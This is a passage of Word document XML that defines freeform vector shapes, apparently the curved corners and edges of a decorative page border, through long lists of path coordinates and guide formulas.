                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7784" y="798"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7833" y="759"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7916" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7957" y="545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7973" y="408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7965" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7932" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7883" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7809" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7768" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7726" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7702" y="194"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7685" y="292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7693" y="408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7718" y="486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7751" y="545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7784" y="564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7817" y="564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7850" y="525"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7866" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7875" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7875" y="292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7858" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7842" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7817" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7792" y="233"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7768" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7784" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7792" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7809" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7833" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7833" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7833" y="428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7817" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7784" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7743" y="408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7726" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7735" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7759" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7792" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7833" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7866" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7899" y="175"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7924" y="272"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7932" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7924" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7883" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7817" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7726" y="700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="246" y="70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144560430" name="Freeform 52"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6955" y="4212"/>
                            <a:ext cx="56" cy="2062"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 57 w 337"/>
                              <a:gd name="T1" fmla="*/ 11986 h 12356"/>
                              <a:gd name="T2" fmla="*/ 131 w 337"/>
                              <a:gd name="T3" fmla="*/ 12239 h 12356"/>
                              <a:gd name="T4" fmla="*/ 230 w 337"/>
                              <a:gd name="T5" fmla="*/ 12239 h 12356"/>
                              <a:gd name="T6" fmla="*/ 288 w 337"/>
                              <a:gd name="T7" fmla="*/ 12103 h 12356"/>
                              <a:gd name="T8" fmla="*/ 296 w 337"/>
                              <a:gd name="T9" fmla="*/ 11928 h 12356"/>
                              <a:gd name="T10" fmla="*/ 255 w 337"/>
                              <a:gd name="T11" fmla="*/ 11792 h 12356"/>
                              <a:gd name="T12" fmla="*/ 164 w 337"/>
                              <a:gd name="T13" fmla="*/ 11811 h 12356"/>
                              <a:gd name="T14" fmla="*/ 148 w 337"/>
                              <a:gd name="T15" fmla="*/ 11986 h 12356"/>
                              <a:gd name="T16" fmla="*/ 181 w 337"/>
                              <a:gd name="T17" fmla="*/ 12025 h 12356"/>
                              <a:gd name="T18" fmla="*/ 214 w 337"/>
                              <a:gd name="T19" fmla="*/ 11967 h 12356"/>
                              <a:gd name="T20" fmla="*/ 189 w 337"/>
                              <a:gd name="T21" fmla="*/ 11908 h 12356"/>
                              <a:gd name="T22" fmla="*/ 238 w 337"/>
                              <a:gd name="T23" fmla="*/ 11928 h 12356"/>
                              <a:gd name="T24" fmla="*/ 247 w 337"/>
                              <a:gd name="T25" fmla="*/ 12045 h 12356"/>
                              <a:gd name="T26" fmla="*/ 214 w 337"/>
                              <a:gd name="T27" fmla="*/ 12122 h 12356"/>
                              <a:gd name="T28" fmla="*/ 148 w 337"/>
                              <a:gd name="T29" fmla="*/ 12103 h 12356"/>
                              <a:gd name="T30" fmla="*/ 107 w 337"/>
                              <a:gd name="T31" fmla="*/ 11986 h 12356"/>
                              <a:gd name="T32" fmla="*/ 115 w 337"/>
                              <a:gd name="T33" fmla="*/ 11831 h 12356"/>
                              <a:gd name="T34" fmla="*/ 173 w 337"/>
                              <a:gd name="T35" fmla="*/ 11694 h 12356"/>
                              <a:gd name="T36" fmla="*/ 263 w 337"/>
                              <a:gd name="T37" fmla="*/ 11694 h 12356"/>
                              <a:gd name="T38" fmla="*/ 329 w 337"/>
                              <a:gd name="T39" fmla="*/ 11870 h 12356"/>
                              <a:gd name="T40" fmla="*/ 329 w 337"/>
                              <a:gd name="T41" fmla="*/ 12142 h 12356"/>
                              <a:gd name="T42" fmla="*/ 230 w 337"/>
                              <a:gd name="T43" fmla="*/ 12337 h 12356"/>
                              <a:gd name="T44" fmla="*/ 107 w 337"/>
                              <a:gd name="T45" fmla="*/ 12317 h 12356"/>
                              <a:gd name="T46" fmla="*/ 16 w 337"/>
                              <a:gd name="T47" fmla="*/ 12025 h 12356"/>
                              <a:gd name="T48" fmla="*/ 0 w 337"/>
                              <a:gd name="T49" fmla="*/ 11772 h 12356"/>
                              <a:gd name="T50" fmla="*/ 8 w 337"/>
                              <a:gd name="T51" fmla="*/ 467 h 12356"/>
                              <a:gd name="T52" fmla="*/ 57 w 337"/>
                              <a:gd name="T53" fmla="*/ 155 h 12356"/>
                              <a:gd name="T54" fmla="*/ 173 w 337"/>
                              <a:gd name="T55" fmla="*/ 0 h 12356"/>
                              <a:gd name="T56" fmla="*/ 288 w 337"/>
                              <a:gd name="T57" fmla="*/ 97 h 12356"/>
                              <a:gd name="T58" fmla="*/ 337 w 337"/>
                              <a:gd name="T59" fmla="*/ 408 h 12356"/>
                              <a:gd name="T60" fmla="*/ 304 w 337"/>
                              <a:gd name="T61" fmla="*/ 603 h 12356"/>
                              <a:gd name="T62" fmla="*/ 214 w 337"/>
                              <a:gd name="T63" fmla="*/ 681 h 12356"/>
                              <a:gd name="T64" fmla="*/ 140 w 337"/>
                              <a:gd name="T65" fmla="*/ 622 h 12356"/>
                              <a:gd name="T66" fmla="*/ 107 w 337"/>
                              <a:gd name="T67" fmla="*/ 467 h 12356"/>
                              <a:gd name="T68" fmla="*/ 123 w 337"/>
                              <a:gd name="T69" fmla="*/ 311 h 12356"/>
                              <a:gd name="T70" fmla="*/ 181 w 337"/>
                              <a:gd name="T71" fmla="*/ 233 h 12356"/>
                              <a:gd name="T72" fmla="*/ 238 w 337"/>
                              <a:gd name="T73" fmla="*/ 291 h 12356"/>
                              <a:gd name="T74" fmla="*/ 255 w 337"/>
                              <a:gd name="T75" fmla="*/ 369 h 12356"/>
                              <a:gd name="T76" fmla="*/ 205 w 337"/>
                              <a:gd name="T77" fmla="*/ 486 h 12356"/>
                              <a:gd name="T78" fmla="*/ 197 w 337"/>
                              <a:gd name="T79" fmla="*/ 447 h 12356"/>
                              <a:gd name="T80" fmla="*/ 205 w 337"/>
                              <a:gd name="T81" fmla="*/ 350 h 12356"/>
                              <a:gd name="T82" fmla="*/ 156 w 337"/>
                              <a:gd name="T83" fmla="*/ 350 h 12356"/>
                              <a:gd name="T84" fmla="*/ 140 w 337"/>
                              <a:gd name="T85" fmla="*/ 467 h 12356"/>
                              <a:gd name="T86" fmla="*/ 214 w 337"/>
                              <a:gd name="T87" fmla="*/ 583 h 12356"/>
                              <a:gd name="T88" fmla="*/ 280 w 337"/>
                              <a:gd name="T89" fmla="*/ 505 h 12356"/>
                              <a:gd name="T90" fmla="*/ 296 w 337"/>
                              <a:gd name="T91" fmla="*/ 350 h 12356"/>
                              <a:gd name="T92" fmla="*/ 263 w 337"/>
                              <a:gd name="T93" fmla="*/ 175 h 12356"/>
                              <a:gd name="T94" fmla="*/ 181 w 337"/>
                              <a:gd name="T95" fmla="*/ 97 h 12356"/>
                              <a:gd name="T96" fmla="*/ 82 w 337"/>
                              <a:gd name="T97" fmla="*/ 233 h 12356"/>
                              <a:gd name="T98" fmla="*/ 49 w 337"/>
                              <a:gd name="T99" fmla="*/ 58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49" y="11772"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="57" y="11986"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82" y="12142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131" y="12239"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="12259"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="12239"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="263" y="12181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="12103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="296" y="12025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="296" y="11928"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="11850"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="11792"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="11772"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="164" y="11811"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="11908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="11986"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="12025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="12025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="205" y="12025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="11967"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="11928"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="11908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="205" y="11870"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="11928"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="11986"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="12045"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="12084"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="12122"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="12122"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="12103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="12064"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="11986"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="11908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="11831"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="11753"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="173" y="11694"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="11675"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="263" y="11694"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="304" y="11772"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="329" y="11870"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="337" y="11967"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="329" y="12142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="12259"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="12337"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="173" y="12356"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="12317"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="12200"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="12025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="11908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="11772"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="330"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="155"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="38"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="173" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="329" y="233"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="337" y="408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="329" y="505"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="304" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="263" y="661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="173" y="661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="622"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="233"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="291"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="330"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="205" y="486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="205" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="330"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="164" y="544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="583"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="505"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="296" y="428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="296" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="263" y="175"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="116"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82" y="233"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="583"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49"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021268611" name="Freeform 53"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5590" y="4147"/>
                            <a:ext cx="46" cy="113"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 49 w 280"/>
                              <a:gd name="T1" fmla="*/ 20 h 681"/>
                              <a:gd name="T2" fmla="*/ 25 w 280"/>
                              <a:gd name="T3" fmla="*/ 0 h 681"/>
                              <a:gd name="T4" fmla="*/ 8 w 280"/>
                              <a:gd name="T5" fmla="*/ 20 h 681"/>
                              <a:gd name="T6" fmla="*/ 0 w 280"/>
                              <a:gd name="T7" fmla="*/ 78 h 681"/>
                              <a:gd name="T8" fmla="*/ 8 w 280"/>
                              <a:gd name="T9" fmla="*/ 117 h 681"/>
                              <a:gd name="T10" fmla="*/ 238 w 280"/>
                              <a:gd name="T11" fmla="*/ 662 h 681"/>
                              <a:gd name="T12" fmla="*/ 255 w 280"/>
                              <a:gd name="T13" fmla="*/ 681 h 681"/>
                              <a:gd name="T14" fmla="*/ 271 w 280"/>
                              <a:gd name="T15" fmla="*/ 662 h 681"/>
                              <a:gd name="T16" fmla="*/ 280 w 280"/>
                              <a:gd name="T17" fmla="*/ 623 h 681"/>
                              <a:gd name="T18" fmla="*/ 271 w 280"/>
                              <a:gd name="T19" fmla="*/ 565 h 681"/>
                              <a:gd name="T20" fmla="*/ 4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49" y="20"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="25" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="662"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271" y="662"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271" y="565"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4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795501076" name="Freeform 54"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6926" y="4147"/>
                            <a:ext cx="46" cy="113"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 239 w 280"/>
                              <a:gd name="T1" fmla="*/ 20 h 681"/>
                              <a:gd name="T2" fmla="*/ 255 w 280"/>
                              <a:gd name="T3" fmla="*/ 0 h 681"/>
                              <a:gd name="T4" fmla="*/ 272 w 280"/>
                              <a:gd name="T5" fmla="*/ 20 h 681"/>
                              <a:gd name="T6" fmla="*/ 280 w 280"/>
                              <a:gd name="T7" fmla="*/ 78 h 681"/>
                              <a:gd name="T8" fmla="*/ 272 w 280"/>
                              <a:gd name="T9" fmla="*/ 117 h 681"/>
                              <a:gd name="T10" fmla="*/ 50 w 280"/>
                              <a:gd name="T11" fmla="*/ 662 h 681"/>
                              <a:gd name="T12" fmla="*/ 25 w 280"/>
                              <a:gd name="T13" fmla="*/ 681 h 681"/>
                              <a:gd name="T14" fmla="*/ 8 w 280"/>
                              <a:gd name="T15" fmla="*/ 662 h 681"/>
                              <a:gd name="T16" fmla="*/ 0 w 280"/>
                              <a:gd name="T17" fmla="*/ 623 h 681"/>
                              <a:gd name="T18" fmla="*/ 8 w 280"/>
                              <a:gd name="T19" fmla="*/ 565 h 681"/>
                              <a:gd name="T20" fmla="*/ 23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239" y="20"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="255" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="272" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="272" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50" y="662"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="662"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="565"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23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800303590" name="Freeform 55"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5590" y="6229"/>
                            <a:ext cx="46" cy="110"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 49 w 280"/>
                              <a:gd name="T1" fmla="*/ 642 h 661"/>
                              <a:gd name="T2" fmla="*/ 25 w 280"/>
                              <a:gd name="T3" fmla="*/ 661 h 661"/>
                              <a:gd name="T4" fmla="*/ 8 w 280"/>
                              <a:gd name="T5" fmla="*/ 642 h 661"/>
                              <a:gd name="T6" fmla="*/ 0 w 280"/>
                              <a:gd name="T7" fmla="*/ 603 h 661"/>
                              <a:gd name="T8" fmla="*/ 8 w 280"/>
                              <a:gd name="T9" fmla="*/ 544 h 661"/>
                              <a:gd name="T10" fmla="*/ 238 w 280"/>
                              <a:gd name="T11" fmla="*/ 19 h 661"/>
                              <a:gd name="T12" fmla="*/ 255 w 280"/>
                              <a:gd name="T13" fmla="*/ 0 h 661"/>
                              <a:gd name="T14" fmla="*/ 271 w 280"/>
                              <a:gd name="T15" fmla="*/ 19 h 661"/>
                              <a:gd name="T16" fmla="*/ 280 w 280"/>
                              <a:gd name="T17" fmla="*/ 58 h 661"/>
                              <a:gd name="T18" fmla="*/ 271 w 280"/>
                              <a:gd name="T19" fmla="*/ 116 h 661"/>
                              <a:gd name="T20" fmla="*/ 4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49" y="642"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="25" y="661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271" y="116"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4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857409602" name="Freeform 56"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6926" y="6229"/>
                            <a:ext cx="46" cy="110"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 239 w 280"/>
                              <a:gd name="T1" fmla="*/ 642 h 661"/>
                              <a:gd name="T2" fmla="*/ 255 w 280"/>
                              <a:gd name="T3" fmla="*/ 661 h 661"/>
                              <a:gd name="T4" fmla="*/ 272 w 280"/>
                              <a:gd name="T5" fmla="*/ 642 h 661"/>
                              <a:gd name="T6" fmla="*/ 280 w 280"/>
                              <a:gd name="T7" fmla="*/ 603 h 661"/>
                              <a:gd name="T8" fmla="*/ 272 w 280"/>
                              <a:gd name="T9" fmla="*/ 544 h 661"/>
                              <a:gd name="T10" fmla="*/ 50 w 280"/>
                              <a:gd name="T11" fmla="*/ 19 h 661"/>
                              <a:gd name="T12" fmla="*/ 25 w 280"/>
                              <a:gd name="T13" fmla="*/ 0 h 661"/>
                              <a:gd name="T14" fmla="*/ 8 w 280"/>
                              <a:gd name="T15" fmla="*/ 19 h 661"/>
                              <a:gd name="T16" fmla="*/ 0 w 280"/>
                              <a:gd name="T17" fmla="*/ 58 h 661"/>
                              <a:gd name="T18" fmla="*/ 8 w 280"/>
                              <a:gd name="T19" fmla="*/ 116 h 661"/>
                              <a:gd name="T20" fmla="*/ 23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239" y="642"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="255" y="661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="272" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="272" y="544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="116"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23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377378608" name="Freeform 57"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5536" y="4020"/>
                            <a:ext cx="1490" cy="20"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 50 w 8929"/>
                              <a:gd name="T1" fmla="*/ 117 h 117"/>
                              <a:gd name="T2" fmla="*/ 0 w 8929"/>
                              <a:gd name="T3" fmla="*/ 0 h 117"/>
                              <a:gd name="T4" fmla="*/ 8929 w 8929"/>
                              <a:gd name="T5" fmla="*/ 0 h 117"/>
                              <a:gd name="T6" fmla="*/ 8887 w 8929"/>
                              <a:gd name="T7" fmla="*/ 117 h 117"/>
                              <a:gd name="T8" fmla="*/ 50 w 8929"/>
                              <a:gd name="T9" fmla="*/ 117 h 117"/>
                            </a:gdLst>
                            <a:ahLst/>
                            <a:cxnLst>
                              <a:cxn ang="0">
                                <a:pos x="T0" y="T1"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T2" y="T3"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T4" y="T5"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T6" y="T7"/>
                              </a:cxn>
                              <a:cxn ang="0">
                                <a:pos x="T8" y="T9"/>
                              </a:cxn>
                            </a:cxnLst>
                            <a:rect l="0" t="0" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="8929" h="117">
                                <a:moveTo>
                                  <a:pt x="50" y="117"/>
                                </a:moveTo>
                                <a:lnTo>
